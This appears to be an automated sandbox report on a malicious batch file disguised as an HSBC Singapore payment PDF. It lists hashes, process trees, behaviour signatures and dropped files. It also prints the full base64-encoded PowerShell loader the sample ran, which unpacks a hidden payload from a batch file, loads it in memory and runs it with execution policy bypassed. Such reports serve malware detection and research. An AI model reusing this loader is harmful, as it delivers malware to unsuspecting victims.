1bb517a6957bc26290355bc932cf65de0c8e6c5360b55a53495d82dae2742ff4

General

Target

HSBC Singapore_Payment Copy_Pdf.bat
Size

225KB
MD5

3d95c53e26f3b959e7fe913ddc859a7d
SHA1

fc5961aac9b29d2822204df5efd44c5eee4557cf
SHA256

c7a329a0f9ccd316709e97776b17f237466b2f27c274d0887d4e445ab31c245e
SHA512

24e9c239f40884d996f833f8fe045f140e4345d5fd64a20edda999bd1b078e8b4faaa6a5f9897613f90848b82c206f3a6a5e4b6acaeaceccb7d576c93d0ca154
SSDEEP

6144:Bj7eSsWZevR/qwMVvT2sS7MaEEaeFPKL3eFTr+BArwfJWiE:BGSr6iwMVIVNCLuF++KE

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

3016 powershell.exe
2656 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

3016 powershell.exe
2656 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3016 powershell.exe
Token: SeDebugPrivilege 2656 powershell.exe

pid	process
3016	powershell.exe
2656	powershell.exe

pid	process
3016	powershell.exe
2656	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2744 wrote to memory of 2208	2744	cmd.exe	cmd.exe
PID 2744 wrote to memory of 2208	2744	cmd.exe	cmd.exe
PID 2744 wrote to memory of 2208	2744	cmd.exe	cmd.exe
PID 2208 wrote to memory of 3016	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 3016	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 3016	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 3016	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 2656	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 2656	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 2656	2208	cmd.exe	powershell.exe
PID 2208 wrote to memory of 2656	2208	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\HSBC Singapore_Payment Copy_Pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\HSBC Singapore_Payment Copy_Pdf.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJvcGVyYS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\opera.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\opera.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
2c35f3d46fdf56bec2f4252e39ad6f50

SHA1
aebdc0ea288d681712144fb0859ff99878a6d63a

SHA256
ba236318f9b7db91072c33b561bddc58108868bff760122b05111c0f6c268e5b

SHA512
4c2cfdfcd8f369f674bd10391c2138d712ba034688a9c910fc126e79c995dfd3afd2a77e5f3c488991a205bb9d4ba47ca5ae7b851dd22980715cefc1453e9be5

Download Submit
C:\Users\Admin\opera.bat
Filesize
225KB

MD5
3d95c53e26f3b959e7fe913ddc859a7d

SHA1
fc5961aac9b29d2822204df5efd44c5eee4557cf

SHA256
c7a329a0f9ccd316709e97776b17f237466b2f27c274d0887d4e445ab31c245e

SHA512
24e9c239f40884d996f833f8fe045f140e4345d5fd64a20edda999bd1b078e8b4faaa6a5f9897613f90848b82c206f3a6a5e4b6acaeaceccb7d576c93d0ca154

Download Submit
C:\Users\Admin\opera.ps1
Filesize
1KB

MD5
e1ba00616d2ed17807a1b2687728a7cd

SHA1
7c881c3fd10f576a4c8cc033072de5b572a241ce

SHA256
3e8dbfb794f86f59b7632fc6184ee4b5e8453b89cea0576fe889a5ad50f2ab7c

SHA512
f60b795c9b13215d376003663f27c1324c4e7a76d5d5f473fd18f42a2e44b56f6ce47f9a9a44f68aea71b0d34ede0bac1ec8743ef01cda681d14ca07527c1ebf

Download Submit
memory/2656-17-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-18-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-27-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-26-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-16-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-25-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-19-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-24-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-20-0x0000000002940000-0x0000000002980000-memory.dmp

Filesize
256KB

Download
memory/2656-23-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/3016-6-0x0000000002AC0000-0x0000000002B00000-memory.dmp

Filesize
256KB

Download
memory/3016-7-0x0000000002AC0000-0x0000000002B00000-memory.dmp

Filesize
256KB

Download
memory/3016-4-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/3016-8-0x0000000002AC0000-0x0000000002B00000-memory.dmp

Filesize
256KB

Download
memory/3016-5-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/3016-10-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads